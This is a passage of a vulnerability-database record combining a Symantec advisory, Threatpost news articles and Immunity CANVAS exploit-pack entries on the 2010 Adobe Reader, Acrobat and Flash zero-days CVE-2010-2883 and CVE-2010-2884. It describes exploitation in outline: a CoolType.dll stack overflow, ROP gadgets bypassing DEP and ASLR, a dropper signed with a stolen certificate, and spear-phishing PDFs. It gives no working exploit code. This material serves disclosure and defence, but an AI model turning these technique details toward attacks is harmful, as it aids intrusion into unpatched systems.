Acrobat 9.1.1 \n * Adobe Acrobat 9.2 \n * Adobe Acrobat 9.3 \n * Adobe Acrobat 9.3.1 \n * Adobe Acrobat 9.3.2 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.3 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat 9.3.4 \n * Adobe Acrobat Professional 7.0.0 \n * Adobe Acrobat Professional 7.0.1 \n * Adobe Acrobat Professional 7.0.2 \n * Adobe Acrobat Professional 7.0.3 \n * Adobe Acrobat Professional 7.0.4 \n * Adobe Acrobat Professional 7.0.5 \n * Adobe Acrobat Professional 7.0.6 \n * Adobe Acrobat Professional 7.0.7 \n * Adobe Acrobat Professional 7.0.8 \n * Adobe Acrobat Professional 7.0.9 \n * Adobe Acrobat Professional 7.1 \n * Adobe Acrobat Professional 7.1.1 \n * Adobe Acrobat Professional 7.1.3 \n * Adobe Acrobat Professional 7.1.4 \n * Adobe Acrobat Professional 8.0 \n * Adobe Acrobat Professional 8.1 \n * Adobe Acrobat Professional 8.1.1 \n * Adobe Acrobat Professional 8.1.2 \n * Adobe Acrobat Professional 8.1.2 Security Update 1 \n * Adobe Acrobat Professional 8.1.3 \n * Adobe Acrobat Professional 8.1.4 \n * Adobe Acrobat Professional 8.1.6 \n * Adobe Acrobat Professional 8.1.7 \n * Adobe Acrobat Professional 8.2 \n * Adobe Acrobat Professional 8.2.1 \n * Adobe Acrobat Professional 8.2.2 \n * Adobe Acrobat Professional 8.2.4 \n * Adobe Acrobat Professional 9 \n * Adobe Acrobat Professional 9.1 \n * Adobe Acrobat Professional 9.1.2 \n * Adobe Acrobat Professional 9.1.3 \n * Adobe Acrobat Professional 9.2 \n * Adobe Acrobat Professional 9.3 \n * Adobe Acrobat Professional 9.3.1 \n * Adobe Acrobat Professional 9.3.2 \n * Adobe Acrobat Professional 9.3.3 \n * Adobe Acrobat Professional 9.3.4 \n * Adobe Acrobat Standard 7.0.0 \n * Adobe Acrobat Standard 7.0.1 \n * Adobe Acrobat Standard 7.0.2 \n * Adobe Acrobat Standard 7.0.3 \n * Adobe Acrobat Standard 7.0.4 \n * Adobe Acrobat Standard 7.0.5 \n * Adobe Acrobat Standard 7.0.6 \n * Adobe Acrobat Standard 7.0.7 \n * Adobe Acrobat Standard 7.0.8 \n * Adobe Acrobat Standard 7.1 \n * Adobe Acrobat Standard 7.1.1 \n * Adobe Acrobat Standard 7.1.3 \n * Adobe Acrobat Standard 7.1.4 \n * Adobe Acrobat Standard 8.0 \n * Adobe Acrobat Standard 8.1 \n * Adobe Acrobat Standard 8.1.1 \n * Adobe Acrobat Standard 8.1.2 \n * Adobe Acrobat Standard 8.1.3 \n * Adobe Acrobat Standard 8.1.4 \n * Adobe Acrobat Standard 8.1.6 \n * Adobe Acrobat Standard 8.1.7 \n * Adobe Acrobat Standard 8.2 \n * Adobe Acrobat Standard 8.2.1 \n * Adobe Acrobat Standard 8.2.2 \n * Adobe Acrobat Standard 8.2.4 \n * Adobe Acrobat Standard 9 \n * Adobe Acrobat Standard 9.1 \n * Adobe Acrobat Standard 9.1.2 \n * Adobe Acrobat Standard 9.1.3 \n * Adobe Acrobat Standard 9.2 \n * Adobe Acrobat Standard 9.3 \n * Adobe Acrobat Standard 9.3.1 \n * Adobe Acrobat Standard 9.3.2 \n * Adobe Acrobat Standard 9.3.3 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Acrobat Standard 9.3.4 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.0.45.2 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Reader 7.0.0 \n * Adobe Reader 7.0.1 \n * Adobe Reader 7.0.2 \n * Adobe Reader 7.0.3 \n * Adobe Reader 7.0.4 \n * Adobe Reader 7.0.5 \n * Adobe Reader 7.0.6 \n * Adobe Reader 7.0.7 \n * Adobe Reader 7.0.8 \n * Adobe Reader 7.0.9 \n * Adobe Reader 7.1 \n * Adobe Reader 7.1.1 \n * Adobe Reader 7.1.2 \n * Adobe Reader 7.1.3 \n * Adobe Reader 7.1.4 \n * Adobe Reader 8.0 \n * Adobe Reader 8.1 \n * Adobe Reader 8.1.1 \n * Adobe Reader 8.1.2 \n * Adobe Reader 8.1.2 Security Update 1 \n * Adobe Reader 8.1.3 \n * Adobe Reader 8.1.4 \n * Adobe Reader 8.1.5 \n * Adobe Reader 8.1.6 \n * Adobe Reader 8.1.7 \n * Adobe Reader 8.2 \n * Adobe Reader 8.2.1 \n * Adobe Reader 8.2.2 \n * Adobe Reader 8.2.3 \n * Adobe Reader 8.2.4 \n * Adobe Reader 9 \n * Adobe Reader 9.1 \n * Adobe Reader 9.1.1 \n * Adobe Reader 9.1.2 \n * Adobe Reader 9.1.3 \n * Adobe Reader 9.2 \n * Adobe Reader 9.3 \n * Adobe Reader 9.3.1 \n * Adobe Reader 9.3.2 \n * Adobe Reader 9.3.3 \n * Adobe Reader 9.3.4 \n * Adobe Reader 9.3.4 \n * Apple Mac OS X 10.5 \n * Apple Mac OS X 10.5.0 \n * Apple Mac OS X 10.5.1 \n * Apple Mac OS X 10.5.2 \n * Apple Mac OS X 10.5.3 \n * Apple Mac OS X 10.5.4 \n * Apple Mac OS X 10.5.5 \n * Apple Mac OS X 10.5.6 \n * Apple Mac OS X 10.5.7 \n * Apple Mac OS X 10.5.8 \n * Apple Mac OS X 10.6 \n * Apple Mac OS X 10.6.1 \n * Apple Mac OS X 10.6.2 \n * Apple Mac OS X 10.6.3 \n * Apple Mac OS X 10.6.4 \n * Apple Mac OS X Server 10.5 \n * Apple Mac OS X Server 10.5.0 \n * Apple Mac OS X Server 10.5.1 \n * Apple Mac OS X Server 10.5.2 \n * Apple Mac OS X Server 10.5.3 \n * Apple Mac OS X Server 10.5.4 \n * Apple Mac OS X Server 10.5.5 \n * Apple Mac OS X Server 10.5.6 \n * Apple Mac OS X Server 10.5.7 \n * Apple Mac OS X Server 10.5.8 \n * Apple Mac OS X Server 10.6 \n * Apple Mac OS X Server 10.6.1 \n * Apple Mac OS X Server 10.6.2 \n * Apple Mac OS X Server 10.6.3 \n * Apple Mac OS X Server 10.6.4 \n * Gentoo Linux \n * Google Chrome 5.0.376.0 \n * Google Chrome 5.0.378.0 \n * Google Chrome 5.0.379.0 \n * Google Chrome 5.0.380.0 \n * Google Chrome 5.0.381.0 \n * Google Chrome 5.0.382.0 \n * Google Chrome 5.0.382.3 \n * Google Chrome 5.0.383.0 \n * Google Chrome 5.0.384.0 \n * Google Chrome 5.0.385.0 \n * Google Chrome 5.0.386.0 \n * Google Chrome 5.0.387.0 \n * Google Chrome 5.0.390.0 \n * Google Chrome 5.0.391.0 \n * Google Chrome 5.0.392.0 \n * Google Chrome 5.0.393.0 \n * Google Chrome 5.0.394.0 \n * Google Chrome 5.0.395.0 \n * Google Chrome 5.0.396.0 \n * Google Chrome 6.0.397.0 \n * Google Chrome 6.0.398.0 \n * Google Chrome 6.0.472.53 \n * Google Chrome 6.0.472.55 \n * Google Chrome 6.0.472.59 \n * Redhat Desktop Extras 3 \n * Redhat Desktop Extras 4 \n * Redhat Enterprise Linux AS Extras 3 \n * Redhat Enterprise Linux AS Extras 4 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux ES Extras 3 \n * Redhat Enterprise Linux ES Extras 4 \n * Redhat Enterprise Linux Extras 3 \n * Redhat Enterprise Linux Extras 4 \n * Redhat Enterprise Linux Supplementary 5 Server \n * Redhat Enterprise Linux WS Extras 3 \n * Redhat Enterprise Linux WS Extras 4 \n * SuSE Moblin 2.0 \n * SuSE Moblin 2.1 \n * SuSE SUSE Linux Enterprise 10 SP3 \n * SuSE SUSE Linux Enterprise 11 \n * SuSE SUSE Linux Enterprise 11 SP1 \n * SuSE Suse Linux Enterprise Desktop 10 SP3 \n * SuSE Suse Linux Enterprise Desktop 11 \n * SuSE Suse Linux Enterprise Desktop 11 SP1 \n * SuSE openSUSE 11.1 \n * SuSE openSUSE 11.2 \n * SuSE openSUSE 11.3 \n * Sun Solaris 10 Sparc \n * Sun Solaris 10 X86 \n * Sun Solaris 11 Express \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. Please see the references for more information.\n", "modified": "2010-09-13T00:00:00", "published": "2010-09-13T00:00:00", "id": "SMNTC-43205", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/43205", "type": "symantec", "title": "Adobe Flash Player CVE-2010-2884 Unspecified Remote Code Execution Vulnerability", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:06:51", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883", "CVE-2010-2884"], "description": "**[](<https://threatpost.com/adobe-issues-huge-patch-reader-and-acrobat-100610/>)UPDATE:** After announcing that it was accelerating a critical patch of its Reader program last week, Adobe pushed out a large patch on Tuesday, fixing 23 separate vulnerabilities in its Reader and Acrobat applications. \n\nThe huge quarterly security update included company[ issued Security Bulletin APSB10-21](<http://www.adobe.com/support/security/bulletins/apsb10-21.html>), patching Adobe Reader up to and including Version 9.3.4 for Windows, mac and UNIX, and Acrobat 9.3.4 for Windows and Macintosh. The patches had originally be scheduled for October 12, 2010 as part of the company\u2019s regularly scheduled quarterly security update.\n\nIncluded in the patch are fixes for two vulnerabilities, [CVE-2010-2883 ](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2883>)and CVE-2010-2884, that are rated critical and that are already being exploited. Adobe [said last week that it would move up the patch](<https://threatpost.com/adobe-release-critical-reader-patch-early-100110/>) to plug the hole in Reader that was[ first disclosed in September ](<http://www.adobe.com/support/security/advisories/apsa10-02.html>)and could give remote attackers control over host systems. That hole, described as a stack overflow in the CoolType.dll used by both Reader and Acrobat, could allow an attacker to crash reader and run their own code on vulnerable systems. It is actively being exploited. The [CVE-2010-2884](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2884>) vulnerability is \u201cunspecified\u201d but effects Reader, Acrobat and Flash and could be used both in denial of service attacks and to run malicious code on vulnerable systems, Adobe said. It is reported to have been used to compromise instances of Flash Player on Windows.\n\nThe two vulnerabilities have been targeted for at least two months, said Kurt Baumgartner, a senior security researcher at Kaspersky Lab. \n\nBaumgartner demonstrated at the Virus Bulletin Conference last week how both vulnerabilities, coupled with return-oriented programming techniques, might be used to evade the latest hardware based protections, dubbed Data Execution Prevention, or DEP, in Windows Vista and Windows 7. \n\nKaspersky data shows that most attacks using the CoolType.dll vulnerability (2883) rely on malcrafted Adobe .pdf variants and have targeted victims in Western Europe and the U.S., as well as Russia. The exploits have been linked to attempts to propagate common malware like the Zeus and Zbot online banking Trojans.\n\n\n\n\u201cUsers are probably lured in to \nopening the file with targeted attacks and blackhat SEO tactics,\u201d Baumgartner wrote in an e-mail.\n\nThe 2884 vulnerability affects Flash and Reader and is also being exploited, though fewer attacks have been spotted using that hole. Kaspersky has detected gaming password stealers and other payloads being \ndelivered with it, Baumgartner said.\n\nIn its bulletin, Adobe recommends applying the patches immediately on vulnerable systems. \n", "modified": "2018-08-15T10:22:14", "published": "2010-10-06T11:42:03", "id": "THREATPOST:8AA8B35E92BA28B94E2BF64862270CA1", "href": "https://threatpost.com/adobe-issues-huge-patch-reader-and-acrobat-100610/74551/", "type": "threatpost", "title": "Adobe Issues Huge Patch for Reader and Acrobat", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:55", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883", "CVE-2010-2884"], "description": "[](<https://threatpost.com/adobe-release-critical-reader-patch-early-100110/>)Adobe is moving up the release date for the patch for the [critical bug in Reader](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) and Acrobat and will now push the fix out on Oct. 5 instead of the following week. The flaw was disclosed last month and has been the target of attacks for several weeks now.\n\nThe company said on Thursday that it has moved the patch release up by a week and as a result, Adobe won\u2019t be releasing any other patches for Reader or Acrobat on its regularly scheduled release day of Oct. 12. \n\n\u201cAdobe is planning to release updates for Adobe Reader 9.3.4 for Windows, \nMacintosh and UNIX, Adobe Acrobat 9.3.4 for Windows and Macintosh, and \nAdobe Reader 8.2.4 and Acrobat 8.2.4 for Windows and Macintosh to \nresolve [critical](<http://www.adobe.com/devnet/security/security_zone/severity_ratings.html>) security issues. These issues include CVE-2010-2883 referenced in [Security Advisory APSA10-02](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) and CVE-2010-2884 referenced in the Adobe Flash Player [Security Bulletin APSB10-22](<http://www.adobe.com/support/security/bulletins/apsb10-22.html>). Adobe expects to make these updates available on October 5, 2010,\u201d Adobe said in its advisory.\n\nAdobe doesn\u2019t release technical details of the vulnerabilities it\u2019s planning to patch, but the bug in Reader and Acrobat can cause the applications to crash and allow an attacker to take complete control of the machine.\n", "modified": "2018-08-15T10:23:01", "published": "2010-10-01T13:36:30", "id": "THREATPOST:C379FC3016F78738819FA6F4866A09E8", "href": "https://threatpost.com/adobe-release-critical-reader-patch-early-100110/74540/", "type": "threatpost", "title": "Adobe to Release Critical Reader Patch Early", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:00", "bulletinFamily": "info", "cvelist": ["CVE-2010-2884"], "description": "[](<https://threatpost.com/adobe-warns-flash-player-zero-day-attack-091310/>)The zero-day hacker attacks against Adobe\u2019s software products are coming fast and furious.\n\nLess than a week after the discovery of a sophisticated malware attack against an unpatched security hole in Adobe Reader/Acrobat, the company has issued a new warning for in-the-wild attacks against a zero-day flaw in its ubiquitous Flash Player.\n\nAdobe says the vulnerability affects Flash Player 10.1.82.76 and earlier versions for Windows, Macintosh, Linux, Solaris, and Android.\n\nIt also affects Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh and UNIX; and Adobe Acrobat 9.3.4 and earlier versions for Windows and Mac. \n\nFrom Adobe\u2019s advisory: \n\n_ \nThis vulnerability (CVE-2010-2884) could cause a crash and potentially allow an attacker to take control of the affected system. There are reports that this vulnerability is being actively exploited in the wild against Adobe Flash Player. Adobe is not aware of any attacks exploiting this vulnerability against Adobe Reader or Acrobat to date._\n\nTechnical details about the vulnerability are not yet available.\n\nAdobe says it expects to issue a Flash Player patch during the week of September 27, 2010.\n\nPatches for Adobe Reader aren\u2019t due until the week of October 4, 2010.\n", "modified": "2018-08-15T12:02:53", "published": "2010-09-13T22:20:18", "id": "THREATPOST:3844E9FEB016F9BD48EB40BAD1397232", "href": "https://threatpost.com/adobe-warns-flash-player-zero-day-attack-091310/74464/", "type": "threatpost", "title": "Adobe Warns of Flash Player Zero-Day Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:58", "bulletinFamily": "info", "cvelist": ["CVE-2010-2884"], "description": "[](<https://threatpost.com/adobe-patches-critical-flash-bug-092010/>)Adobe has [released a patch](<http://www.adobe.com/support/security/bulletins/apsb10-22.html>) to fix a [critical vulnerability in its ubiquitous Flash Player](<https://threatpost.com/adobe-warns-flash-player-zero-day-attack-091310/>) software that was disclosed last week. The company pushed up its release plans for the patch after reports emerged that the bug already was being exploited.\n\nThe details of the Flash vulnerability aren\u2019t public, but Adobe officials said last week that they were aware of public attacks against the bug.The [patches released Monday](<http://www.adobe.com/support/security/bulletins/apsb10-22.html>) fix the flaw on Windows, Mac OS X, Linux, Android and Solaris.\n\n\u201cA [critical](<http://www.adobe.com/support/security/severity_ratings.html>) \nvulnerability exists in Adobe Flash Player 10.1.82.76 and earlier \nversions for Windows, Macintosh, Linux, Solaris, and Adobe Flash Player \n10.1.92.10 for Android. This vulnerability also affects Adobe Reader \n9.3.4 for Windows, Macintosh and UNIX, and Adobe Acrobat 9.3.4 and \nearlier versions for Windows and Macintosh. This vulnerability \n(CVE-2010-2884) could cause a crash and potentially allow an attacker to \ntake control of the affected system. There are reports that this \nvulnerability is being actively exploited in the wild against Adobe \nFlash Player on Windows. Adobe is not aware of any attacks exploiting \nthis vulnerability against Adobe Reader or Acrobat to date,\u201d the company said in its [advisory](<http://www.adobe.com/support/security/advisories/apsa10-03.html>).\n\nAdobe published a patch for versions of Flash Player running in Google Chrome last week. \n\nThere is still an [unpatched critical bug in Adobe Reader](<https://threatpost.com/new-adobe-pdf-zero-day-flaw-under-attack-090810/>), which also is being exploited in the wild right now. Adobe has said that it plans to release a fix for that flaw in the first week of October.\n", "modified": "2018-08-15T12:00:32", "published": "2010-09-20T18:25:54", "id": "THREATPOST:FDAD16A1B1335A437715B93C112D44D3", "href": "https://threatpost.com/adobe-patches-critical-flash-bug-092010/74494/", "type": "threatpost", "title": "Adobe Patches Critical Flash Bug", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:02", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883"], "description": "[](<https://threatpost.com/adobe-exploit-bypasses-aslr-and-dep-drops-signed-malicious-file-090910/>)Attackers are using a previously unknown exploitation technique that bypasses both ASLR and DEP to exploit the [unpatched Adobe Reader bug](<https://threatpost.com/new-adobe-pdf-zero-day-flaw-under-attack-090810/>) that Adobe warned users about on Wednesday. The exploit works on machines running either Windows Vista or Windows 7 and is also dropping a file on compromised machines that is signed using a stolen, valid digital certificate.\n\nAdobe published an [advisory about the new Reader bug](<http://www.adobe.com/support/security/advisories/apsa10-02.html>) on Wednesday, but was stingy with the details, saying only that it affected Reader 9.3.4 and earlier versions and could cause the application to crash. \n\n\u201cThis vulnerability (CVE-2010-2883) could cause a crash and \npotentially allow an attacker to take control of the affected system. \nThere are reports that this vulnerability is being actively exploited in \nthe wild. Adobe is in the process of evaluating the schedule for an update to resolve this vulnerability,\u201d the company said in its advisory.\n\nHowever, researchers who have looked at the publicly available exploits say that the bug itself is a stack-based buffer overflow in Reader that uses a novel exploitation technique that makes use of return-oriented programming to bypass the exploit mitigations ASLR (Address Space Layout Randomization) and DEP (Data Execution Protection). \n\n\u201cWhat I haven\u2019t mentioned yet, is that this exploit document does \nsomething that I haven\u2019t seen in the wild yet. This exploit works on \nWindows Vista and Windows 7. Unlike the previous exploits, it is not \ndependent on a hardcoded Windows XP syscall. Additionally, it uses a \npreviously unpublished technique to bypass ASLR,\u201d Metasploit researcher [Joshua J. Drake said in his analysis of the exploit](<http://blog.metasploit.com/2010/09/return-of-unpublished-adobe.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+metasploit%2Fblog+%28Metasploit+Blog%29>). \u201cThe gadgets that \nare used for this ROP payload come from a module named \u2018icucnv36.dll\u2019. \nThis module does not support ASLR (nor does it opt in to DEP, although \nthat is largely irrelevant).\u201d\n\nAdobe\u2019s products are high on the list of targets for attackers these days, and this new attack brings a couple of interesting twists, aside from the bypass of ASLR and DEP on Windows 7. \n\nOn Wednesday, Roel Schouwenberg, a researcher at Kaspersky Lab, said that the malicious file installed on machines compromised via the new Reader exploit is [digitally signed using a valid certificate](<http://www.securelist.com/en/blog/2287/Adobe_Reader_zero_day_attack_now_with_stolen_certificate>) belonging to a credit union in Missouri. \n\n\u201cWhile most malicious PDFs download their payload, this time the PDF \nhas malicious content embedded. The PDF drops an executable into the \n%temp% directory and tries to execute it,\u201d Schouwenberg said. \u201cThe file it drops is digitally signed with a valid signature from a US-based Credit Union!\u201d\n\nThis is the second major attack in the last few months that has used a stolen certificate to sign a malicious file. The [Stuxnet attack](<https://threatpost.com/stuxnet-may-be-new-new-thing-malware-072210/>), which exploited a previously unknown bug in the Windows shell, included two separate files that were signed by two Taiwanese technology companies. This technique has been seen in the past, but not in the kind of sophisticated exploits involved in the Stuxnet and Reader attacks. \n\nAdobe has not specified when it plans to release a patch for the Reader bug. The company is planning to add a sandbox to upcoming versions of Reader to help prevent attacks against the application from affecting the rest of a system, something that customers and security experts have been [calling for Adobe to do](<https://threatpost.com/i-have-only-one-security-prediction-2010-010610/>) for some time. \n\n\u201cIt sure seems like the attackers are feeling the pressure of Adobe\u2019s upcoming sandbox,\u201d Drake said in his analysis.\n", "modified": "2018-08-15T12:04:19", "published": "2010-09-09T15:38:42", "id": "THREATPOST:B03CCA88ADB6EA7D4199BB22A231A09C", "href": "https://threatpost.com/adobe-exploit-bypasses-aslr-and-dep-drops-signed-malicious-file-090910/74445/", "type": "threatpost", "title": "Adobe Exploit Bypasses ASLR and DEP, Drops Signed Malicious File", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:02", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883"], "description": "Adobe today sounded an alarm for a new zero-day flaw in its PDF Reader/Acrobat software, warning that hackers are actively exploiting the vulnerability in-the-wild.\n\nDetails on the vulnerability are not yet public but the sudden warning from Adobe is a sure sign that rigged PDF documents are being used by malicious hackers to take complete control of machines with the latest versions of Adobe Reader/Acrobat installed.\n\nHere\u2019s Adobe\u2019s warning:\n\n_A critical vulnerability exists in Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh and UNIX, and Adobe Acrobat 9.3.4 and earlier versions for Windows and Macintosh. This vulnerability (CVE-2010-2883) could cause a crash and potentially allow an attacker to take control of the affected system.There are reports that this vulnerability is being actively exploited in the wild._\n\nAdobe is in the process of evaluating the schedule for an update to resolve this vulnerability.\n\nOminously, Adobe said it cannot offer any pre-patch advice to help users thwart the attacks.\n\n__\n\nUnfortunately, there are no mitigations we can offer. However, Adobe is actively sharing information about this vulnerability (and vulnerabilities in general) with partners in the security community to enable them to quickly develop detection and quarantine methods to protect users until a patch is available. As always, Adobe recommends that users follow security best practices by keeping their anti-malware software and definitions up to date. \n\n\nAn Adobe spokeswoman described the attacks as \u201climited\u201d but warned that that could change with the availability of public exploit code. \n\nShe said the company was notified of the attacks yesterday (Tuesday September 7, 2010) via information from a private partner company. \n\nAffected software includes:\n\n * Adobe Reader 9.3.4 and earlier versions for Windows, Macintosh and UNIX\n * Adobe Acrobat 9.3.4 and earlier versions for Windows and Macintosh\n\nThe next batch of Adobe Reader/Acrobat patches is scheduled for October 12, 2010 but it is likely the company will ship an out-of-band update for this issue. \n\n** \nUPDATE**: A sample PDF from the attack is publicly available. It targets Windows users, affects Acrobat 8 and 9, exploits multiple versions at once, and bypasses DEP and ASLR.\n", "modified": "2013-04-17T16:36:07", "published": "2010-09-08T17:50:52", "id": "THREATPOST:7EB236A105B2A90AE3D49D600743FD5A", "href": "https://threatpost.com/new-adobe-pdf-zero-day-flaw-under-attack-090810/74442/", "type": "threatpost", "title": "New Adobe PDF Zero-Day Flaw Under Attack", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:52", "bulletinFamily": "info", "cvelist": ["CVE-2010-2883"], "description": "Researchers have identified a strain of malware that\u2019s being used in a string of targeted attacks against defense contractors, government agencies and other organizations by leveraging exploits against zero-day vulnerabilities. The attacks may have been going on since 2009 in some form and the emails containing the malicious attachments are specifically targeted at executives and officials in various industries using fake conference invitations.\n\nThe attack campaign, as many do, appears to be changing frequently, as the attackers use different binaries and change up their patterns for connecting to remote command-and-control servers. The research, done by Seculert and Zscaler, shows that the attackers are patient, taking the time to dig up some information about their potential targets, and are carefully choosing organizations that have high-value intellectual property and assets.\n\nThe malware used in these attacks has been dubbed MSUpdater Trojan, as it attempts to conceal its presence on the machine by disguising its outbound communications as Windows Update requests. The researchers first saw the infection on Dec. 25, 2011, and then, working backward from the malware\u2019s infection routine, connection pattern and other characteristics, were able to find much older incidents that seem to have been the work of the same attackers.\n\n\u201cIt is likely that the Christmas day infection resulted from a targeted phishing email as related attacks in this report identify this as the attack vector. No suspicious web transactions were observed from the infected host prior to the C&C beaconing,\u201d the [Seculert-Zscaler report](<http://www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf>) says.\n\nThe phishing emails that are the carrier for this threat include a PDF attachment that appears to be an invitation to some conference that is likely relevant to the target. Once the victim opens the PDF, the exploit code targets a vulnerability in Adobe Reader that was first publicized by [researchers at Contagio](<http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html>) in September as part of an ongoing phishing campaign, and later was patched by Adobe. Many of these attacks occurred before the Reader flaw was known publicly.\n\n\u201cIt appears that the usage of emails with conference invitations that contain malicious attachments (mostly PDF files) is growing, as we identified several spear-phishing attacks started using this method. \nAttackers are trying to lure employees of specific organizations with \u201cinvitations\u201d to relevant industry conferences. In addition to ISSNIP, we have seen malicious invitations to an **IEEE Aerospace Conference**, an **Iraq Peace Conference** and more. The targeted attacks identified by Seculert and Zscaler, which share a few similar technical parameters (thus, regarded as created by the same group of attackers) arrive in emails with a malicious PDF attachment, mostly related to a conference in the targeted industry. The PDF exploits, at that time, 0-day vulnerabilities within Adobe Reader and executes series of malicious files in a sophisticated manner,\u201d [Seculert](<http://blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html>) wrote in an analysis of the attacks.\n\nOnce the malware is resident on an infected machine, it will reach out to a remote C&C server and deliver some information about the machine that it\u2019s on, including the OS level and some custom identifiers that serve as the authentication method for the new client to the server. The malware then can download new files from the server, upload files to it and execute commands issued by the C&C machine. Like some other threats that have cropped up in recent years, the malware used in this campaign has the ability to detect whether it\u2019s being dropped into a virtual machine environment. If it detects a VM, the malware won\u2019t install the actual Trojan component and will simply exit.\n\nThe research by Seculert and Zscaler shows that the attacks are targeting companies and organizations in the defense industry as well as the aerospace sector. The first attacks likely occurred as far back as early 2009, they said, and while some of the binaries used in the incidents are detected by security software under various names, they haven\u2019t been correlated as part of one ongoing campaign before.\n\nDefense contractors have been frequent targets of various attack crews for a long time now, and some of the more recent high profile attacks have been against these companies. Researchers have connected the [attack against RSA](<https://threatpost.com/rsa-securid-attack-was-phishing-excel-spreadsheet-040111/>) last year to subsequent intrusions at defense contractors that were users of the company\u2019s SecurID tokens.\n", "modified": "2013-04-17T16:32:54", "published": "2012-01-31T17:05:17", "id": "THREATPOST:C72C7FCC81BF5AAC3568B7D47E08CE3C", "href": "https://threatpost.com/ongoing-targeted-attack-campaign-going-after-defense-aerospace-industries-013112/76157/", "type": "threatpost", "title": "Ongoing Targeted Attack Campaign Going After Defense, Aerospace Industries", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T17:19:25", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2884"], "description": "**Name**| flash_wild2 \n---|--- \n**CVE**| CVE-2010-2884 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Flash 0day CVE-2010-2884 \n**Notes**| CVE Name: CVE-2010-2884 \nVENDOR: Adobe \nVersionsAffected: \nRepeatability: \nDate public: Not public/0day \nCVE Url: \nCVSS: 9.3 \n\n", "edition": 2, "modified": "2010-09-15T18:00:00", "published": "2010-09-15T18:00:00", "id": "FLASH_WILD2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/flash_wild2", "type": "canvas", "title": "Immunity Canvas: FLASH_WILD2", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:21", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "description": "**Name**| acrobat_ttf_sing \n---|--- \n**CVE**| CVE-2010-2883 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Acrobat Reader TTF Bug \n**Notes**| CVE Name: CVE-2010-2883 \nNotes: \nVersionsAffected: Acrobat Reader <= 9.3.4 